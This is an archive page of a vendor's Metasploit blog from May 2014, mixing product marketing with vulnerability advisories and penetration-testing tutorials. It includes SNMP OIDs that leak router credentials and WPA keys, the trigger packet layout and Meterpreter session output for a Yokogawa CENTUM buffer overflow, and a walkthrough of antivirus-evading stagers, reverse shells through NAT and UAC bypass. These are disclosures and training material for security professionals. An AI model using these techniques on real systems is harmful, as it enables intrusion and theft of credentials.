Skip navigation
All Places > Metasploit > Blog > 2014 > May
2014

Earlier this week we heard from ckirsch, Senior Product Marketing Manager for Metasploit at Rapid7, on the pressure penetration testers are facing. (Hint: it's a lot!). With the increase in high profile breaches and their costs, more and more emphasis is being put on the pen tester and security in general. Read on if you'd like to get the top takeaways from this week's webcast so that you aren't left in the dark about, "7 Ways to Make Your Penetration Tests More Productive":

 

  1. Pen testers are in higher demand than ever – Pen testers are extremely highly skilled professionals. Hard to train, harder to find. With the latest developments to PCI enforcing stricter rules around penetration testing methodologies, remediation, and re-testing, pen test costs will be high and the tester's time will be extremely valuable since schedules will book up quickly as organizations clamber to prepare for their audits. This means that security professionals must increase productivity and do more with the same resources, or use expertise in more meaningful ways to get the job done. Increased productivity will allow them to complete more assessments, reduce backlog, enable businesses more quickly, and increase their own market value.
  2. Automation + Scalability = Time SavingsWith Metasploit Pro, pen testers can save 45% of their time through many simplified and expedited processes that don't sacrifice quality or thoroughness. You can even set up your own custom workflows to automate additional processes. In particular, the tool allows for automated:
    • Tracking of all data (large sets gathered by both Metasploit and outside sources included!)
    • Baseline pen tests
    • Web app tests
    • Vulnerability validation
    • Post-exploitation modules
    • Social engineering
  3. Reporting is king – Reporting can be the biggest headache when it comes time to pen test your network. Metasploit Pro tracks every action of a pen test for easy audit trails. Some popular reports include compromised hosts, credentials, web app testing, PCI DSS, and FISMA. Features like this allow security professionals to be more efficient and focused fully on their assessment.

 

To learn how your organization can be more secure by making penetration test processes more productive, efficient, scalable, and automated, and to see a demonstration of how each of the 7 tips can be accomplished in Metasploit Pro, view the webcast on-demand now.

The Wireshark DoS Module

 

Wireshark_Icon.pngThis week, we have an interesting new module from Metasploit community contributor JoseMi, which exercises a (seeming) denial-of-service (DoS) condition in a Wireshark dissector responsible for decoding CAPWAP packets. No, I've never heard of CAPWAP either, but Wikipedia's article, now I'm an expert! At any rate, it's not a protocol that you would expect to find really anywhere, given that no real wireless access point support it yet, and you should certainly not find it on the Internet. If I'm wrong on this, please let me know in the comments. I'd love to know what, if any, devices support this protocol in production.

 

That said, this points out some interesting similarities, and differences, between Wireshark and Metasploit development models. Like Metasploit modules, most Wireshark dissectors come from community contributors, rather than paid, full-time software developers connected to the project. We get plenty of Metasploit modules that target obscure software that most people never run into, and there are a fair amount of Wireshark dissectors like this one; many people only care about the top 10 Metasploit modules, and I expect most people only care about a tiny handful of Wireshark dissectors for their day-to-day. Also like Metasploit modules, by default, you get access to all of Wireshark's dissectors. However, there are a couple of important distinctions to be made here in terms of safety.

 

First, no Metasploit module runs without some kind of assertive action from the user. Second, Metasploit modules tend to be the source of "unstrusted user data," while Wireshark tends to be the receiver. While it's not impossible to mess up a Metasploit instance through some honeypot techniques, you have no way of forcing a Metasploit user to attack you. In this respect, Wireshark is much more like a "server" application, while Metasploit tends to be a "client" application.

 

These factors, along with the usual problems of trusting untrustable data for things like offset calculations -- makes Wireshark a delightful target for attackers, based purely on the technical profile. Add to this the likely profile of Wireshark users: Network administrators and security people. On top of that, you've got the likely privileges of the Wireshark process -- Wireshark begs you not to run as root, but people do it all the time anyway. This adds up to one of the most attractive targets of opportunity attackers can have.

 

The Wireshark core developers are constantly guarding against unintentionally (or intentionally) backdooring basically everyone's network monitoring infrastructure, and for that we all owe them a massive debt of gratitude. That said, mistakes happen -- even Metasploit ships an occasional bug. While JoseMi's module targets just one DoS condition, this bug came from a fuzzing run that turned out seven other CVE-designated issues. So, not to pick on Wireshark (too much), but if you're interested in contributing to Metasploit, that set of CVEs would be a fine place to start.  The bugs and the patches are public, the protocols involved tend to be pretty well documented, and the payoff for an arbitrary code exec is pretty huge.

 

Incidentally, while this module in particular is "just a DoS," any organization falling victim to this can have some significant degradation of its monitoring capability. And don't forget that the problem is in the dissector, not just Wireshark, so any monitoring that's built on top of TShark (the command line version of Wireshark) is also vulnerable. Figuring out why TShark is crashing can be a frustrating experience, especially if you're also in the middle of another attack.

 

Finally, thanks to the original CAPWAP dissector authors, Alexis and Tanmay, as well as the core Wireshark developer community. This post is absolutely not intended to denigrate your efforts to make Wireshark the most complete packet dissector around -- it's a continuous miracle that open source software development happens at all, let alone at the level of quality that Wireshark achieves. Pretty much everyone I know uses Wireshark routinely, and it's all because of the open source authors like you guys. Thanks.

 

New Modules

We have three new modules this week, including the above-discussed Wireshark DoS module.

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes (also last week's).

Where in the world are my shells?

 

A couple weeks back, we published a post module from Tom Sellers which helps out tremendously with geolocating a target computer based on which wireless networks are nearby. Seriously, this module is the bee's knees, and can really help illustrate risk to an organization -- I can imagine scenarios where an attacker has a persistent shell on a company executives laptop, and can simply use this module (or something like it) to check in on where he spends his time, which is sure to creep said executives out.

 

Now, Tom has a delightful demo showing exactly how one would go about using it -- click below to see his video, which incidentally is the first video added to the soon-to-be-glorious Metasploit Framework Screencasts Youtube channel.

 

geolocate-video-link.png

 

Don't get me wrong, Mubix's Metasploit Minute webcasts are great and recommended for new users to Metasploit, as are many, many of the over 65,000 videos claiming to have something to do with Metasploit. The focus of the Metasploit screencasts channel is, well, simple screencasts of with Metasploit Framework that can help lllustrate the usage for both old and popular modules as well as some new hotness that may need a little extra explanation. They may also explore some alternate usages of modules that have lots of options, For example, many auxiliary modules have an ACTION list that can change how or why you would use a module, depending on circumstances. Actually demoing in screencast format can help illustrate quickly what those scenarios might be.

 

So, feel free to bug Tom about dropping some voice over audio -- ideally in the baritone tones of a Morgan Freeman mixing board -- to explain what's going on. Or, alternatively, experience this super fun module in all its zaniness with the venerable Benny Hillifier (warning, clicking this link may irritate your co-workers fairly instantly).

 

New Modules

We have five new modules for this week's update -- the three from Rapid7's Deral Heiland which explore default SNMP configurations on popular home and small business routers, which we disclosed late last week, and an exploit against Symantec's enterprise workstation management system, Symantec Workspace Streaming and a SQL injection module against Advantech's product, both by the one and only Juan Vazquez.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

(This guest blog comes to us from Louis Sanchez, a Network Systems Specialist that is employed at a Cancer Center in the North East)

 

In late February of this year, I was presented with the opportunity to participate in the new Metasploit Pro Specialist certification pilot. The goal of this new certification was to provide the training required to have a proficient understanding of Metasploit Pro. By providing a baseline of knowledge required to be certified, managers would be able to verify that their employees or potential employees would have the skills required to validate vulnerabilities. When I say vulnerabilities, I do not only mean vulnerabilities from a services or software version standpoint alone, but also from staff education through phishing and website coding by using a web app scanner.

 

When I was first introduced to pen-testing I spent almost all my time in the Metasploit Framework. I still use the framework today and find it an invaluable tool. I have been utilizing Metasploit Pro for over a year now, and it makes providing reports or automation so simple. Like many Rapid7 Metasploit Pro or any software vendor customers, I have had to call support and review some of the inner workings of Metasploit Pro from time to time.  Between my framework experience and Pro experience I had a decent basic understanding of how Rapid7's Metasploit Pro worked. So, I agreed to take part in the pilot not only to learn the Metasploit Pro product, but also validate my knowledge. Sometimes it is easy to take for granted how things simply work, but after reviewing the details of how the different components communicate, I have a new found appreciation for the product. I spent several days reviewing and utilizing resources, such as the administrator guide to learn everything you could want to know about Metasploit Pro. I decided it was time to take the exam, and I passed!

 

After preparing for the certification exam, I learned more about utilizing tags, which has helped me become a more effective Metasploit Pro operator, as I can more meaningfully organize my targets. Also, I learned of several enhancements regarding the web application scanner, which I found to be a great step in the right direction. One of which was that now the scanner allows for URL blacklisting, this really helps prevent authenticated crawl from accidentally navigating to the log off button. Even though there have been several instances where I have been able to utilize the Metasploit Pro knowledge I gained through my certification, the one that sticks out to me is Open SSL vulnerability heartbleed. I was able to confidently utilize Metasploit Pro with its Nexpose integration to scan and prioritize remediation. As many of us know, not all vulnerabilities can be exploited and therefore it is critical to find the true risks to your organization first. I can say with confidence that taking the time to participate in the Metasploit pilot and become certified was well worth it.

Summary of Vulnerabilities

 

This report details three critical information disclosure vulnerabilities. The vulnerabilities were discovered while Matthew Kienow and I (Deral Heiland) were researching information disclosure issues in SNMP on embedded appliances for a talk at CarolinaCon. During this research project, most devices exposed information that would be classified as benign or public. That said, in three cases we discovered devices that allowed the extraction of authentication data via the read only community string of public. In two cases this was the default behavior. Regarding the impact of these vulnerabilities, casual investigation of public information revealed a large number of the affected devices are exposing SNMP to the public Internet. This data is available from the Shodan search engine.

 

While it can certainly be argued that information disclosure vulnerabilities are simple to resolve and largely the result of poor system configuration and deployment practices, the fact remains that these issues can be exploited to gain access to sensitive information. In practice, the low-hanging fruit are often picked first. And with that, we have three new disclosures to discuss.

The first involves a Brocade load balancer (you might have one of these in your rack). The second and third involve some consumer-grade modems from Ambit (now Ubee) and Netopia (now Motorola). For the modem/routers, you might have one of these at a remote office, warehouse, guest wi-fi network, water treatment plant, etc. They are quite common in office and industrial environments where IT doesn't have a strong presence. Shodan identifies 229,409 Ambit devices exposed to the internet, and 224,544 of the Netopia devices. Of theres, 187,000 appear to be in the United States.

Moreover, the tested modems are currently end-of-life, which means that the chances of firmware updates to address these insecure defaults are quite unlikely to be released. Of course, just because something is end-of-life doesn't mean it disappears from the Internet -- causal Shodan browsing attests to that. Further, we cannot know if these configurations persist in current, supported offerings from the vendors, but you might want to check yours when you get a chance to download Metasploit.

 

Disclosure Timeline: R7-2014-01 Brocade Load Balancer

 

Date

Description

Feb 05, 2014

Initial disclosure to the vendor (Brocade)

Feb 20, 2014

Disclosure to CERT/CC

Feb 27, 2014

CERT/CC acknowledges receipt (VU#139516)

May 16, 2014

Metasploit module published in Pull Request 3365

 

Technical Analysis

adx_1000.jpg

 

The Brocade ServerIron ADX 1016-2-PREM, TrafficWork Version 12.5.00T403 application load balancer stores username and passwords hashes within the SNMP MIB tables at the following OID Indexes:

 

  • Username:            1.3.6.1.4.1.1991.1.1.2.9.2.1.1        
  • Password hash:    1.3.6.1.4.1.1991.1.1.2.9.2.1.2

 

The Brocade ServerIron load balancer has SNMP enabled by default. The community string “public" is configured by default. Unless SNMP is disabled, or the public community string is changed, an attacker can easily extract the passwords hashes for an offline brute force attack.

 

Disclosure Timeline: R7-2014-02 Ubee/Ambit

 

Date

Description

Feb 07, 2014

Initial disclosure to the vendor (Ubee)

Feb 10, 2014

Phone conference call with Ubee to discuss findings
Mar 26, 2014

Disclosed to CERT/CC

May 15, 2014Metasploit module published in Pull Request 3365


Technical Analysis

DDW3611.png

 

The Ambit U10C019 and Ubee DDW3611 series of cable modems store the following information within the SNMP MIB tables at the following OID Indexes:

 

U10c019

Username:             1.3.6.1.4.1.4684.2.17.1.2.1.1.97.100.109.105.110

Password:              1.3.6.1.4.1.4684.2.17.1.1.1.2.97.100.109.105.110

WEP Keys Index:   1.3.6.1.4.1.4684.2.14.2.5.1.2

WPA PSK:             1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.6

SSID:                     1.3.6.1.4.1.4684.2.14.1.2.0

 

DDW3611

Username:            1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0

Password:            1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0

WEP Key Index:   1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12

WPA PSK:           1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12

SSID:                  1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12

 

By default, SNMP is not enabled on these devices. Although currently a number of cable providers that utilize Ubee devices enable SNMP with the community string of "public" on the uplink side of the cable modem for remote management purposes. Making in possible in those cases to enumerate this data over the Internet.

 

 

Disclosure Timeline: R7-2014-03 Motorola/Netopia

Date

Description

Feb 07, 2014

Initial disclosure to the vendor (Motorola)

Mar 26, 2014

Disclosure to CERT/CC

Apr 7, 2014

CERT/CC acknowledges receipt (VU#779628)

May 16, 2014Metasploit module published in Pull Request 3365

Technical Analysis

netopia_3347.png

 

The Netopia 3347 series of DSL modems store the following information within the SNMP MIB tables at the following OID Indexes:

 

  • WEP Keys Index:  1.3.6.1.4.1.304.1.3.1.26.1.15.1.3
  • WPA PSK:             1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1
  • SSID:                     1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1

 

SNMP is enabled by default with the community string of “public” on the internal interface of this product. The DSL side is not enabled by default, but currently a number of DSL providers that still utilize the Netopia 3347 series devices enable SNMP with community string of public on the uplink side of the DSL for remote management purposes. Making in possible in those cases to enumerate this data over the Internet.

 

Exploitation

 

Metasploit auxiliary modules have been developed for extraction of data from these devices via SNMP. The screenshot below shows the use of the brocade_enumhash module.

 

brocade-metasploit.png

Figure 1: Metasploit brocade_enumhash Module

 

If you are curious about your own infrastructure, and would like to use these scanner modules to assess your risk exposure, you're invited get your free Metasploit download now or update your existing installation. Feel free to comment below if you have any other questions or concerns.

 

 

I would also like to give recognition to good friend Brenden Morgenthaler. Brenden found a password exposure issue via SNMP in his home cable modem (not one listed in this advisory) in 2012. This piece of information, which he shared with me, led me to further investigate other cable/DSL modem devices as part this SNMP information exposure research project.

By guest blogger Shane Rudy, Information Security Manager, AOScloud, C|EH | E|CSA | L|PT | CPT | CEPT

 

About a month ago I wrote an article about the new anti-virus evasion capabilities in the latest release of Metasploit Pro 4.9. In this article I'll take this a step further and discuss another related feature: Dynamic Payload generation from the Metasploit Pro console using the auxiliary/pro/generate_dynamic_stager auxiliary module. This module has replaced the older exploit/pro/windows/dynamic_exe module.

 

I’ll discuss using this module in conjunction with the bypassuac memory injection module over a public network scenario. I’m writing this article because it addresses some questions that I have seen posted around the net and have also pondered myself. My aim is to provide you a clearer understanding on the behavior of payloads, stagers and architecture and what to expect when attacking through NAT. Things aren’t always what they seem...

 

In this article you will learn the following:

  • How to use the new auxiliary/pro/generate_dynamic_stager auxiliary module to create your stager executable that will bypass antivirus
  • Issues you could encounter if the proper architecture isn't specified or if you have a mismatch in the exploit target or payload
  • How to use the bypassuac memory injection technique to elevate your privileges on the target
  • How to perform all of the above through NAT

 

*Note: If you're using the free version of Metasploit, the auxiliary/pro/generate_dynamic_stager auxillary module will not be available. If this is the case have a look at downloading and using the Veil Framework for AV evasion for your initial payload.


There a couple caveats that need to be addressed. First when you use any of the Metasploit bypassuac modules, the account that your Meterpreter payload is running as needs to be a member of the Administrators group on the target. If you read the documentation on them you should notice this. Second you may ask, well if my account that Meterpreter is running under already has admin rights then why is this important? It's important for a couple of reasons. First UAC has multiple modes in which it can run that can hinder your progress. We want to bypass them altogether. Second, if your Meterpreter session doesn’t have elevated rights then you may not get that far depending on your skill set. Many great articles have been written on the elevation of privilege which is outside the scope of this article, but I suggest you read them so you don’t get lazy. A good place to start reading up on the basics is here.


To begin we have setup a simple network for this exercise that looks like this:

Network.jpeg.jpg

In the scenario above the attacker located behind a firewall and has been given a public IP address of 74.222.220.166. Port 4444 is open on the external interface of the firewall to allow traffic from the Internet to be forwarded to his attack system located behind the firewall at IP 10.2.0.125.

 

First I will create the initial stager using the new auxiliary/pro/generate_dynamic_stager that replaced the old standalone exploit/pro/windows/dynamic_exe.

I will be using the following version of Metasploit Pro:

version.jpeg.jpg

Next I will load the new dynamic stager auxiliary by typing use auxiliary/pro/generate_dynamic_stager I then configure it once it's loaded as shown:

stager_options.jpeg.jpg

Notice above the ARCH setting is set to x86_64. Most systems these days are 64-bit. If you do not set this and use a 32-bit stager with this exercise you will need to migrate to a 64-bit process or you could  see the error Exploit Failed: Rex:: TimeoutError Operation timed out. So just make a mental note that if you see this, more than likely it's was usually because you were using a  64-bit-only piece of meterpreter functionality while in a 32-bit process space. To avoid issues make sure you know whether you require 64-bit functionality or not. For example If you're using a 32-bit meterpreter you will want to migrate up to a 64-bit process if you require something like a memory read using mimikatz on a 64-bit system. This may seem trivial to some of you, but I have seen that error posted a ton on a lot of blogs so I wanted to address it.


Once I type exploit my stager is now ready for the victim. Next I type exploit and the stager executable is created as shown:

generate_stager.jpeg.jpg

Once the stager is created I can upload it to my victim host for testing demonstrating this proof of concept. In real life this could be a social engineering expedition or some other form of awesome hacktivism (powersploit invoke shellcode anyone?) but for demo purposes this will suffice.

windows.jpeg.jpg

Next I will go back to my attacker box and fire up Metasploit's multi/handler utility as shown:

fireup_multi.jpeg.jpg

Next I will start a listener using Metasploit’s multi/handler utility to handle the inbound connection from the victim machine as shown:

start_listener.jpeg.jpg

Again notice here that I have used the 64-bit version of Meterpreter. I have set my LHOST to 10.2.0.125. This is fine for my first connection. However as you will see I will change this IP address to the attacker's public IP address once I setup and execute the bypassuac exploit. Just keep this in the back of your mind for right now.

 

Now I will type exploit and then go to the victim machine and run the stager executable to establish my initial connection and Meterpreter session as shown:

stager_execution.jpeg.jpg

Above you can see that I have established my first session. Now I am going to background this session, but I will use it to launch the bypassuac attack.

background.jpeg.jpg

Next I search metasploit for bypassuac exploits and I get two hits as shown:

search_bypass.jpeg.jpg

In this exercise I will use the bypassuac_injection exploit. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. My options will be set as shown below. Notice that I have set the session to 1 because that is the first session I established and will use to exploit UAC to gain a second elevated session. I have also created a new Meterpreter payload and set the LHOST setting to the public IP address of the attacker. What is important to note on this, is that when this actually executes, the initial bind to that public IP will look like it fails on the screen and it will be set to 0.0.0.0. But remember how I said that things aren’t what they seem? Even though this happens, that public address will still be written to the payload and connect back to the attacker’s public IP address from the victim sitting behind their corporate firewall with a private IP address behind a NAT.

bypass_injection_options.jpeg.jpg

Now all that is left is to type exploit and I should be good to go.

bypass_exploitation.jpeg.jpg

Notice above that the handler failed to bind to the public IP address and instead started the reverse handler on 0.0.0.0:4444. This is expected. But he exploit succeeds and I now have a new session called session 2 that has been opened. This is the new elevated session. Let’s check this to be sure:

privs.jpeg.jpg

whoami.jpeg.jpg

And there you have it.

 

In this article I introduced you to the new auxiliary/pro/generate_dynamic_stager that replaced the old standalone exploit/pro/windows/dynamic_exe, I demonstrated setting up your Meterpreter payload when dealing with NAT as well as discussing the dreaded Exploit Failed: Rex:: TimeoutError message and finally using the bypassuac injection technique to gain elevated privileges.  I hope you enjoyed this article. --Happy Hackin'.

Meterpreter for All The Platforms

 

This week is pretty exciting for us, since it's not every day we give out commit rights to the Rapid7 Metasploit repo. I'm very happy to report that Tim Wright has agreed to step up and help out with moving Meterpreter research and development forward, focusing mainly on the Java and Android implementations.

 

java-android.jpgMany Metasploit users are familiar with Meterpreter for Windows, since it's the default payload for Microsoft systems and effectively the reference implementation. In fact, Metasploit contributor OJ Reeves will be talking about Meterpreter internals on Friday at AusCERT2014, so if you're in the area or otherwise attending, you should certainly check it out.

 

That said, many people also don't know that Meterpreter is more than just a Windows rootkit / backdoor / persistence agent for Windows.  It's a whole protocol and system for interacting with compromised machines, and has always been intended to be cross-platform. Today, we have versions written in POSIX, PHP, Python, and Java/Android. It's that last one that's been getting a lot of attention lately, primarily by community contributors mihi, Anwar, and of course the aforementioned Tim.

 

There are tons and tons of cool new features and boring old bugfixes just waiting to be committed in the many Meterpreters (Meterpreti?), so if you have ideas, or better, a willingness to run through test cases and documentation, or best, code to contribute to make those features a reality, I strongly urge you to get in touch with OJ, Tim, or really anyone from Rapid7, all of whom tend to hang out on the #metasploit channel on Freenode IRC.

 

New Modules

We have two new exploits this week: yet another Flash reverse engineered from yet another 0day found circulating in the wild, and another Yokogawa CS3000 module. Both are thanks to Juan Vazquez.

 

Exploit modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product, and disclosed three of the vulnerabilities we found on March 10 on this blog. As noted in the talk, we intended to release information about all of the vulnerabilities we found in the product at the time. Today, after some negotiation with Yokogawa and ICS-CERT, we're disclosing another of the discovered vulnerabilities, in a network service running by default in CENTUM CS3000 installation. The vendor asked for some extra time to assess and address this vulnerability, which is why we ended up with a slightly laggy disclosure schedule this time.

 

For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerability Summary

 

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKESimmgr.exe” service, started automatically on the System startup by default, listens on TCP/34205. By sending a specially crafted packet to the port TCP/34205 it’s possible to trigger an stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

 

Disclosure Timeline

 

DateDescription
Dec 27, 2013Initial disclosure to the vendor, Yokogawa
Jan 13, 2014Disclosure to CERT/CC
Jan 14, 2014CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014

CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.

ICS-CERT tracking #: ICS-VU-205881

JPCERT tracking #: JVNVU#98181377, JPECERT#98191377

March 6, 2014Yokogawa and ICS-CERT asks for an extension for R7-2013-19.2 (this vulnerability)
May 9, 2014Metasploit module published in Pull Request #3344

 

Technical Analysis

 

The vulnerability exists in the function sub_409310 (IDA notation). This function tries to extract data (probably strings) from a user sent packet. But the function does an insecure usage of memcpy like function, to copy user controlled data to a static size (64 bytes) stack buffer:

 

.text:00409360 loc_409360:                            ; CODE XREF: get_string_sub_409310+42j
.text:00409360                mov    ecx, 10h
.text:00409365                xor    eax, eax
.text:00409367                lea    edi, [esp+50h+var_40]
.text:0040936B                add    esi, edx
.text:0040936D                rep stosd              ; init var_40 with 0x0.
.text:0040936F                mov    ecx, ebx        ; The memcpy length comes from user controlled data
.text:00409371                lea    edi, [esp+50h+var_40] ; destination, var_40 (0x40 bytes buffer)
.text:00409375                mov    edx, ecx
.text:00409377                lea    eax, [esp+50h+var_40]
.text:0040937B                shr    ecx, 2  ; divides the size by 4 because it's using rep movsd, where every movsd is for a double word (4 bytes)
.text:0040937E                rep movsd              ; esi pointing to user controlled data from the packet, leading to overflow








 

The above assembly chunk translates to:

 

char dst[64];
memset(dst, 0, 64);
memcpy(dst, user_data, user_length);








 

Where user_data and user_lenght are user controlled values.

 

Exploitation

 

It’s possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/34205. According to our understanding the packet has the next format:

 

FieldLength
Header6 bytes
DataLength specified in the header

 

Where the header structure is:

 

FieldLength
Identifier4 bytes
Data Length2 bytes

 

A packet with an identifier 0x1 in the header can be used to trigger the vulnerability. For this packet the data structure is:

 

FieldLength
Identifier4 bytes
Data Length2 bytes
DataData Length bytes

 

A packet with “0x1” as Identifier in both the Header and the Data can be used to reach the vulnerable function. The Data Length and Data fields can be used to trigger the buffer overflow.

 

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 running on Windows XP SP3 and Windows 2003 SP2 (DEP bypas), where is possible to gain arbitrary code execution by corrupting the SEH handler stored in the stack:

 

msf exploit(yokogawa_bkesimmgr_bof) > exploit

[*] Started reverse handler on 192.168.172.1:4444

[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 427 bytes...

[*] Sending stage (770048 bytes) to 192.168.172.192

[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.192:1048) at 2013-11-17 21:17:14

-0600

meterpreter > getuid

Server username: HIS0101\CENTUM

meterpreter > sysinfo

Computer : HIS0101

OS : Windows XP (Build 2600, Service Pack 3).

Architecture : x86

System Language : en_US

Meterpreter : x86/win32

meterpreter >

 

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Back from the UK!

 

As I mentioned last blog post, I was off last week in London, where I finally got the chance to meet an overflow of far-flung Metasploit and security luminaries, including the folks from 44Con and MWR Labs. My bucket list just got shorter. And yes, "overflow" is the correct collective noun for a gathering of security professionals and hackers.

 

Sadly, this means I managed to completely miss last week's blog post, so this week will be a two-week wrap up. We had some neat stuff land while I was away, so lets get to it.

 

OpenSSH Username Disclosure

First off, this isn't the fake OpenSSH memory disclosure bug, but instead, something real and useful, and incidentally unpatched. William Vu worked with Metasploit open source contributor kenkeiras to implement an old school timing attack on OpenSSH servers, where differences in response time for login attempts can be used to suss out what usernames are valid on a given system. While this module feels like a 90s-era info disclosure, the surprising bit is that this information leak does not appear to have a patch or any reasonable workaround.

 

As security professionals, we seem to be of two minds when it comes to username security. Passwords are obviously secret, and disclosing those is a Bad Thing, but we seem to be less sure about the confidentiality of usernames. On the one hand, they're significantly not passwords.  They're intended to be talked about, shared, and tied to particular people and services. On the other hand, determining valid usernames in the blind makes the job of a bruteforce attack about a million times easier.

 

When determining if something like this is a "real" vulnerability, it seems to mostly come down to the intent of the software. With OpenSSH, there is an implicit guarantee that usernames should not be harvestable, just like DNS zone transfers and SMTP VRFY commands shouldn't spill these weak secrets. How big of a deal is it when that guarantee is violated? It all depends on how seriously you take username security. It sure feels insecure. If you feel like this is a bigger deal, or not a deal at all, you're invited to comment below.

 

"Flash: Aaaah!"

 

hawkman.jpg

I really hope you also hear that title in Freddie Mercury's voice. If not, then I'm kind of sad for you. You're really missing out, and you probably mistook the photo at right for a scene from one of the 300 movies.


That said, we have another two modules for the seemingly endless parade of Flash bugs. Both were originally disclosed by that rascal of a security researcher, "Unknown," and implemented by our own Juan Vazquez, with some help from his shadowy network of contacts and informants in general and one Bannedit in particular.

 

Take a moment at read up on the module and the references for the Flash Integer Underflow bug and the Flash Type Confusion issue, because you're going to need that background for next week's release, I'm sure. In case you haven't noticed, this spring is starting to feel a lot like last year's Javapocolypse. Maybe it's time to give Silverlight another chance? What could go wrong?

 

The 2014 T-Shirt Cometh

As of this moment, you have another week to get your T-shirt design in for the Second Annual Metasploit T-Shirt Design Contest. Right now the 99Designs page is claiming something like two hours to go, but never mind on that -- believe me, you have a week. So, forget all those findings reports and boring IT meeting you need to prepare for, and finish off your chest-mounted masterpeice. Feel free to include some kind of weird 80s sci-fi references, since that will obviously work for me.

 

New Modules

For the last two weeks, we've got ten new modules for your exploitation pleasure, including those discussed above. The Wireshark vulnerability is especially close to my heart, since approximately 99% of all people who are likely to get owned by an exploit in Wireshark are terribly, terribly interesting targets: security analysts, network engineers, and the like. These are people who tend to have cached credentials to lots of infrastructure.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes (also last week's).

In the section about Point-of-Sale Intrusions, the Verizon 2014 Data Breach Investigations Report recommends to "Debunk the flat network theory" to protect POS devices. Here's what it says on page 19:

 

Debunk the flat network theory

Review the interconnectivity between stores and central locations and treat them as semi-trusted connections. Segment the POS environment from the corporate network

 

This struck me as a little odd since network segmentation is a well-known and common best practice on most networks. Also, there is a strong economic incentive for companies to segment their main corporate network from anything touching credit cards: If you segment off the parts of your network that contain credit card data, your PCI scope is limited to the segments that have credit cards. In other words, you will only have to implement PCI requirements and demonstrate compliance for part of your network, not your entire network. This can mean a huge reduction in compliance costs. Since businesses mostly follow the money, it seems hard to believe that network segmentation is not prevalent with today's retailers.

 

I believe that the culprit is more likely to be a bad process for change control. As networks evolve, they change organically. Even if your network segmentation was architected and executed perfectly on day one, it will have undergone several changes. I've often heard of data breaches where a firewall configuration was changed to test something and not changed back when the test was completed.

 

One way to solve this is to implement better change control processes, but this is hard to enforce, especially in smaller organizations where process is a much heavier burden on the organization. Even in larger organizations, people could make "quick changes" outside of the process. Therefore, it is a good idea to audit whether network segmentation is operational and effective. In fact, the new PCI 3.0 standard requires that you do this if you're using network segmentation to reduce your PCI scope.

 

Rapid7 Metasploit Pro can test network segmentation by sending packets between two segments, namely between Metasploit itself and a testing server. The MetaModule tests all ports between the two machines to determine which ports are open and closed. This enables you to compare "what is" to "what should be" and determine compliance with your internal security policy and ultimately with the PCI standard.

 

Segmentation Testing.png

 

If you would like to test out Metasploit Pro's Firewall and Network Segmentation Testing MetaModule, you can get a free Metasploit Pro trial from Rapid7.com.

One of my key take-aways in the Verizon Data Breach Incident Report was that credentials are a major attack vector in 2013. Especially within the POS Intrusions, brute forcing and use of stolen creds was a major problem.

 

verizon_fig22_bruteforcing.png

 

These techniques were primarily leveraged against two targets: Shared passwords on 3rd-party provided POS systems were the biggest problem, followed directly by weak passwords on remote access solutions that enable the help desk to quickly provide help to employees working on the POS devices.

 

verizon_fig23_desktopsharing.png

When I talk to security professionals, they often tell me that they leverage L0phtcrack for brute forcing. While it's a great tool, it's really specialized in offline cracking of password hashes. For offline cracking, you need to have access to a hash that is stored in a system, typically a Windows or Unix user password.

 

